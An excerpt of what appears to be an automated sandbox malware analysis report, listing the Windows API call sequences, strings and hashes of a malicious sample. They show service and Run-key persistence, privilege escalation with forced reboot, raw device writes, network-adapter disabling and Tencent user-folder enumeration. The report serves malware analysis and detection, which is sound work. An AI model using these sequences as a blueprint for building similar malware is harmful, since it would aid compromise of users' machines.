                                                                    • API ID: Service$strlen$FileOpenstrcat$ChangeConfig2CreateDatabaseStartstrcpy$AttributesCopyDirectoryEnvironmentErrorExpandLastLockManagerModuleNameStringsUnlockValue_accesslstrlenmemsetstrncmpwsprintf
                                                                    • String ID: %$%ProgramFiles%\$Description$Dhttdfv.exe$Rsjshd fzfgkqcm$SYSTEM\CurrentControlSet\Services\$\$s
                                                                    • API String ID: 3757774263-1935338918
                                                                    • Opcode ID: 01eca40504263f1132f5f6e331a13b7c5b0fa288b6d049b7c33866324f32549b
                                                                    • Instruction ID: 4802be21e15c6790a195652bbc467ed91045842eea411fe39eef3066dbc81b5d
                                                                    • Opcode Fuzzy Hash: 01eca40504263f1132f5f6e331a13b7c5b0fa288b6d049b7c33866324f32549b
                                                                    • Instruction Fuzzy Hash: 7F81CDB180026CAFEB21DF94CC89EDABBBCFB09640F4045EAF609A2155D7749B94CF51
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,100145A0,00000001), ref: 10001534
                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000159F
                                                                    • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 100015C6
                                                                    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 100015DA
                                                                    • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 100015EF
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100015F2
                                                                    • Sleep.KERNEL32(000007D0), ref: 100015FD
                                                                    • GetVersion.KERNEL32 ref: 10001603
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001617
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1000161E
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 1000162E
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 1000164D
                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 10001656
                                                                    • exit.MSVCRT ref: 1000165D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ControlDeviceFileProcessToken$AdjustCloseCreateCurrentExitHandleLookupOpenPrivilegePrivilegesSleepValueVersionWindowsWriteexitmemcpy
                                                                    • String ID: .$0$A$C$D$E$H$I$I$L$P$R$S$SeShutdownPrivilege$U$V$Y$\$\$\
                                                                    • API String ID: 4093840555-1807105605
                                                                    • Opcode ID: ca68aad574e8622a45233f099ca570715badae249df225ca9196920a04f0dc22
                                                                    • Instruction ID: e1ef4f8c5b2394e99dc06edf204db353c7ef66d7161cebdd5f6de16399095a1f
                                                                    • Opcode Fuzzy Hash: ca68aad574e8622a45233f099ca570715badae249df225ca9196920a04f0dc22
                                                                    • Instruction Fuzzy Hash: 324130B180829CFEFB0197A4CC89FEF7E7CAB15389F044095F655A6182C7B94E088B75
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,Rsjshd fzfgkqcm,1000C2E0,00000000), ref: 00411B05
                                                                    • ExpandEnvironmentStringsA.KERNEL32(100131B8,?,00000104), ref: 00411B18
                                                                    • strlen.MSVCRT ref: 00411B25
                                                                    • strncmp.MSVCRT ref: 00411B39
                                                                    • wsprintfA.USER32 ref: 00411B7F
                                                                    • strlen.MSVCRT ref: 00411B8C
                                                                    • strlen.MSVCRT ref: 00411BA5
                                                                    • _mbscat.MSVCRT ref: 00411BBE
                                                                    • _mbscat.MSVCRT ref: 00411BD1
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 00411BE8
                                                                    • memset.MSVCRT ref: 00411C03
                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000104,?), ref: 00411C16
                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00411C2D
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00411C4F
                                                                    • CreateServiceA.ADVAPI32(00000000,10013038,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00411C88
                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 00411C95
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000001,Rsjshd fzfgkqcm), ref: 00411CB9
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 00411D34
                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 00411D40
                                                                    • GetLastError.KERNEL32 ref: 00411D4E
                                                                    • OpenServiceA.ADVAPI32(?,10013038,000F01FF), ref: 00411D69
                                                                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00411D7C
                                                                    • StartServiceA.ADVAPI32(?,00000000,00000000), ref: 00411D8A
                                                                    • _mbscpy.MSVCRT(?,10013F48), ref: 00411DA0
                                                                    • _mbscat.MSVCRT ref: 00411DAF
                                                                      • Part of subcall function 00410BAA: strlen.MSVCRT ref: 00410BD2
                                                                      • Part of subcall function 00410BAA: _access.MSVCRT ref: 00410BF9
                                                                      • Part of subcall function 00410BAA: CreateDirectoryA.KERNEL32(?,00000000), ref: 00410C10
                                                                      • Part of subcall function 00410BAA: strlen.MSVCRT ref: 00410C18
                                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00411DCA
                                                                    • lstrlen.KERNEL32(00411809), ref: 00411DD3
                                                                    • RegSetValueExA.ADVAPI32(?,10013F3C,00000000,00000001,00411809,00000000), ref: 00411DEA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$strlen$FileOpen_mbscat$ChangeConfig2CreateDatabaseStart_mbscpy$AttributesCopyDirectoryEnvironmentErrorExpandLastLockManagerModuleNameStringsUnlockValue_accesslstrlenmemsetstrncmpwsprintf
                                                                    • String ID: %$Rsjshd fzfgkqcm$\$s
                                                                    • API String ID: 2753262143-2137445856
                                                                    • Opcode ID: 1a164b2253530368cbfa9980f9aac64b4eeb3e7e9e095d432233d9937d35876a
                                                                    • Instruction ID: b8906f91a9fa5c7d0cebef24898c3ac72a118a4adacd4eeca1440459578dc4ae
                                                                    • Opcode Fuzzy Hash: 1a164b2253530368cbfa9980f9aac64b4eeb3e7e9e095d432233d9937d35876a
                                                                    • Instruction Fuzzy Hash: 5781CCB180026CABDB229F94DC89EDABBBCFB08744F4444EAF609E2151D7749B94CF54
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,100145A0,00000001), ref: 00409580
                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 004095EB
                                                                    • WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00409626
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040963E
                                                                    • Sleep.KERNEL32(000007D0), ref: 00409649
                                                                    • GetVersion.KERNEL32 ref: 0040964F
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409663
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040966A
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,10012038,?), ref: 0040967A
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00409699
                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 004096A2
                                                                    • exit.MSVCRT ref: 004096A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileProcessToken$AdjustCloseCreateCurrentExitHandleLookupOpenPrivilegePrivilegesSleepValueVersionWindowsWriteexitmemcpy
                                                                    • String ID: .$0$A$C$D$E$H$I$I$L$P$R$S$SeShutdownPrivilege$U$V$Y$\$\$\
                                                                    • API String ID: 2514494162-1807105605
                                                                    • Opcode ID: eb2849e64336eebdac97a16cf0d763112d11adcce26e973367d915f6ba5464be
                                                                    • Instruction ID: 457228d4055dc80ddf074a706b31d143ccccf3617fbd5fa182cf65f74fecd903
                                                                    • Opcode Fuzzy Hash: eb2849e64336eebdac97a16cf0d763112d11adcce26e973367d915f6ba5464be
                                                                    • Instruction Fuzzy Hash: DF4110B180829CFEFB0197A4CC99FEF7E7C9B15349F044095F655A6182C7B94E088B75
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,Function_0000502A,?,00000000,00000000,00000001,?,?,?,?,Function_00005239,?,00000000), ref: 10006079
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 10006090
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 1000616D
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 10006184
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100061A9
                                                                    • wsprintfA.USER32 ref: 100062B4
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00020006,rsion\Run), ref: 100062D0
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100062EB
                                                                    • RegSetValueExA.ADVAPI32(rsion\Run,?,00000000,00000001,?,00000000), ref: 10006306
                                                                    • RegCloseKey.ADVAPI32(00000072), ref: 10006311
                                                                    • Sleep.KERNEL32(00000000), ref: 10006320
                                                                    • memset.MSVCRT ref: 10006375
                                                                    • memcpy.MSVCRT(?,?,000005F4,?,00000000,000005F4), ref: 10006388
                                                                    • OutputDebugStringA.KERNEL32(?), ref: 10006397
                                                                    • GetVersionExA.KERNEL32(?), ref: 100064E1
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 100066A8
                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 100066BB
                                                                    • strcpy.MSVCRT(?,00000000), ref: 10006711
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 10006717
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$AllocVirtual$FileModuleName$??3@CloseDebugOpenOutputSleepStringValueVersionmemsetstrcpywsprintf
                                                                    • String ID: %c%c%c%c%c%c$Rsjshd fzfgkqcm$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$rsion\Run
                                                                    • API String ID: 3125802572-371884834
                                                                    • Opcode ID: 014e1a74b99de1fcdf98ede77bdfc152f10749523a94f3daacbd89ef24d7045f
                                                                    • Instruction ID: 001f7eab40b8c1efd8fb61ea1c58bdaa5a143593c0ae2d8cc968a69052e087b5
                                                                    • Opcode Fuzzy Hash: 014e1a74b99de1fcdf98ede77bdfc152f10749523a94f3daacbd89ef24d7045f
                                                                    • Instruction Fuzzy Hash: 6D22B071D04259AEFF21CBA0CC89FEFBBBEEB0A384F144095F14865055CB765A94CB62
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FC5D
                                                                      • Part of subcall function 0040F2D5: lstrcpy.KERNEL32(?,10013484), ref: 0040F33A
                                                                    • memset.MSVCRT ref: 0040FCD2
                                                                    • getsockname.WS2_32(?,?,?), ref: 0040FCEB
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0040FD00
                                                                    • memcpy.MSVCRT(?,?,00000032,?,?,00000004), ref: 0040FD15
                                                                    • GetVersionExA.KERNEL32(?), ref: 0040FD2E
                                                                    • RegOpenKeyA.ADVAPI32(80000002,10013D98,?), ref: 0040FD65
                                                                    • RegQueryValueExA.ADVAPI32(?,10013D90,00000000,?,?,?), ref: 0040FD80
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040FD89
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FDFB
                                                                    • GetDriveTypeA.KERNEL32(?), ref: 0040FE36
                                                                    • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 0040FE51
                                                                    • memset.MSVCRT ref: 0040FEA2
                                                                    • GetLastInputInfo.USER32(?), ref: 0040FEC8
                                                                    • GetTickCount.KERNEL32 ref: 0040FECE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: memset$memcpy$CloseCountDiskDriveFreeGlobalInfoInputLastMemoryOpenQuerySpaceStatusTickTypeValueVersiongetsocknamelstrcpy
• String ID: :$@$Default$Rsjshd fzfgkqcm$V10.0 Pro$\
• API String ID: 1232973178-280790721
• Opcode ID: b0de46014619328ea4046d2ff91efce593752122d7313dd730b3ce67eee27348
• Instruction ID: 71f1d9a426fcb670f4f5ca0ae33ac1a73810843bf670ae4046250e5d3a30475d
• Opcode Fuzzy Hash: b0de46014619328ea4046d2ff91efce593752122d7313dd730b3ce67eee27348
• Instruction Fuzzy Hash: 0181DEB2D0122CABDB21DBA5DD89FDEB7BCAB04355F4041A6E508F3181D7749A88CF64

APIs
• GetCurrentProcess.KERNEL32 ref: 00410AA6
• OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00410AB3
• LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00410B10
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00410B33
• CloseHandle.KERNEL32(?), ref: 00410B3C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
• String ID: D$P$S$b$e$e$e$e$g$g$i$i$l$r$u$v
• API String ID: 3038321057-1035330691
• Opcode ID: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
• Instruction ID: 8ef02c6428b305f39a105f81569b4b49d32ba9c36380e36ffe8469dbe40ef7e7
• Opcode Fuzzy Hash: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
• Instruction Fuzzy Hash: 9B21F1609082CDDEFF01CBE8C848BEFBFB99B15749F180088D14576292D7BA5A58C776

APIs
• GetCurrentProcess.KERNEL32 ref: 10008A5A
• OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 10008A67
• LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10008AC4
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 10008AE7
• CloseHandle.KERNEL32(?), ref: 10008AF0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
• String ID: D$P$S$b$e$e$e$e$g$g$i$i$l$r$u$v
• API String ID: 3038321057-1035330691
• Opcode ID: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
• Instruction ID: 1b422eb70a6b503645a6854424b1df98c394f0022e88ccbf2a13525e0ae78bc9
• Opcode Fuzzy Hash: 1f8af41a29dc6ba370d3ea4e38587daa48d96f7a611b70922b13c76158938810
• Instruction Fuzzy Hash: 2C21F1609082CDDEFB01CBE8C848BEFBFB9AB16749F140048D18576192D7BA4A58C776

APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 0040DEE1
• OpenServiceA.ADVAPI32(00000000,10012FD4,000F01FF), ref: 0040DEF2
• DeleteService.ADVAPI32(00000000), ref: 0040DEF9
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040DF0B
• lstrcat.KERNEL32(?,?), ref: 0040DF50
• DeleteFileA.KERNEL32(?), ref: 0040DF5D
• exit.MSVCRT ref: 0040DF65
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: DeleteOpenService$DirectoryFileManagerSystemexitlstrcat
• String ID: .$D$Rsjshd fzfgkqcm$\$a$e$e$f$k$l$t$u$y
• API String ID: 3392600227-1081949225
• Opcode ID: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
• Instruction ID: c22a01dc393668847851f56136fa3f06600cf10012881ae33b39abbd7e87e008
• Opcode Fuzzy Hash: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
• Instruction Fuzzy Hash: 4B110D7080839CEAFB0197E4CC4DBCDBFA95B11749F0880C4E284AA192C6BA5259C736

APIs
• SetupDiGetClassDevsA.SETUPAPI(00000000,PCI,00000000,00000006), ref: 10001689
• SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 100016AE
• SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,00000008,?,00000000,00000064,?), ref: 100016FC
• GetLastError.KERNEL32 ref: 10001702
• GetLastError.KERNEL32 ref: 10001704
• GetLastError.KERNEL32 ref: 1000170B
• LocalFree.KERNEL32(00000000), ref: 10001727
• GetLastError.KERNEL32 ref: 10001748
• _strcmpi.MSVCRT ref: 10001765
• SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,?,00000014), ref: 10001796
• GetLastError.KERNEL32 ref: 100017A0
• SetupDiCallClassInstaller.SETUPAPI(00000012,00000000,0000001C), ref: 100017A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: ErrorLastSetup$Class$Device$CallDevsEnumFreeInfoInstallInstallerLocalParamsPropertyRegistry_strcmpi
• String ID: PCI${4D36E972-E325-11CE-BFC1-08002BE10318}
• API String ID: 642159545-2021903297
• Opcode ID: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
• Instruction ID: 5221d74791923a7f40e25a3fd04af9b124186ef5fcdd9a6e8b2e96944c23c535
• Opcode Fuzzy Hash: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
• Instruction Fuzzy Hash: E8411D72A0422DAEEB11DBE1DC84FDEBBFCEB09790F504166F605E2054DB309A44CBA1

APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(10012FD4,1000918B), ref: 004110D7
• Sleep.KERNEL32(000001F4), ref: 00411135
• GetVersionExA.KERNEL32(?), ref: 0041114C
• Sleep.KERNEL32(0000003C), ref: 00411175
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041118B
• wsprintfA.USER32 ref: 004111A4
• CloseHandle.KERNEL32(00000000), ref: 004111BA
• exit.MSVCRT ref: 004111D1
• Sleep.KERNEL32(000001F4), ref: 0041121B
  • Part of subcall function 00410EDE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,1000C044,00411173), ref: 00410EF9
  • Part of subcall function 00410EDE: CloseHandle.KERNEL32(00000000,?,?,1000C044,00411173), ref: 00410F00
• Sleep.KERNEL32(000001F4), ref: 0041125F
• Sleep.KERNEL32(000001F4), ref: 0041129A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Sleep$CloseHandle$CtrlFileHandlerModuleNameObjectRegisterServiceSingleVersionWaitexitwsprintf
• String ID: Rsjshd fzfgkqcm
• API String ID: 3641833367-3753134293
• Opcode ID: 38dbba103b8c40cf8ea751231ac1e72af01c2f5a352f21008b732a6ba94cab33
• Instruction ID: fd2b120b4fc6690d88fcffe129d916c3725f2caf03789538dd5a6798ecc00858
• Opcode Fuzzy Hash: 38dbba103b8c40cf8ea751231ac1e72af01c2f5a352f21008b732a6ba94cab33
• Instruction Fuzzy Hash: 64413C71505328EFF7109F50CD88F977A79EB1535BF88405AE208AF1A0C7BA8884CFA4

APIs
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: State$memset$AsyncSleeplstrlen
• String ID:
• API String ID: 2124264721-0
• Opcode ID: f7b00ed52e65a6ad86fd6f30d77661969ed8bac0c82b702656f3d6f047290f55
• Instruction ID: 5595caee0828672a794d0883c5a33027727b91ff7973cea1771655f4e09a715d
• Opcode Fuzzy Hash: f7b00ed52e65a6ad86fd6f30d77661969ed8bac0c82b702656f3d6f047290f55
• Instruction Fuzzy Hash: DD51F7B1804728EBEB10AFA4DDC8BDA7779EF44305F1042B7E50AB31C1D7388A459B59

APIs
• SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1000143A
• strcpy.MSVCRT(?,?), ref: 10001464
• strcat.MSVCRT(?,\Tencent\Users\*.*,?,?), ref: 10001475
• FindFirstFileA.KERNEL32(?,?), ref: 1000148B
• FindNextFileA.KERNEL32(00000000,?), ref: 100014A1
• FindNextFileA.KERNEL32(00000000,?), ref: 100014AB
• strcat.MSVCRT(?,10012020), ref: 100014C6
• strlen.MSVCRT ref: 100014D2
• memcpy.MSVCRT(100141A0,?,00000000,?,?,10012020), ref: 100014E6
• strlen.MSVCRT ref: 100014F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$Nextstrcatstrlen$FirstFolderPathSpecialmemcpystrcpy
                                                                    • String ID: \Tencent\Users\*.*
                                                                    • API String ID: 32453827-2867266411
                                                                    • Opcode ID: 0e9ed596772dea9435d2b6d5cb19268fceceabfd9ed7487ab96d6fb6ccadf9c7
                                                                    • Instruction ID: d8db5fde510372d23f86df106748315c5a8d19b761381b980c5ae1831a61d9d8
                                                                    • Opcode Fuzzy Hash: 0e9ed596772dea9435d2b6d5cb19268fceceabfd9ed7487ab96d6fb6ccadf9c7
                                                                    • Instruction Fuzzy Hash: AC2177B390021C6BEB11DBA0CC85FDE77BCEB09740F0005E2E709E6155EA74AB888E61
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00410FE5
                                                                    • memset.MSVCRT ref: 00410FF1
                                                                    • GetCurrentProcess.KERNEL32 ref: 00411013
                                                                    • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 00411023
                                                                    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0041103A
                                                                    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00411063
                                                                    • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 0041108F
                                                                    • FreeLibrary.KERNEL32(?), ref: 004110B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$memset$CreateCurrentDuplicateFreeInformationLibraryOpenUser
                                                                    • String ID: D
                                                                    • API String ID: 578660257-2746444292
                                                                    • Opcode ID: 253597a001000e577f99565faad50eba916f5472f64ec596e2b0885566f29c30
                                                                    • Instruction ID: e7405c07e7ce0f5ff3362315ff69bab1206dc4577edd43b4b48e0494b544edec
                                                                    • Opcode Fuzzy Hash: 253597a001000e577f99565faad50eba916f5472f64ec596e2b0885566f29c30
                                                                    • Instruction Fuzzy Hash: 8831D4B1D0122DEADB10EBE5CC89EDEBFBCEF09754F104016F205A6160D7B45A84DBA4
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 100058DD
                                                                    • memset.MSVCRT ref: 100058FB
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A601
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A614
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A622
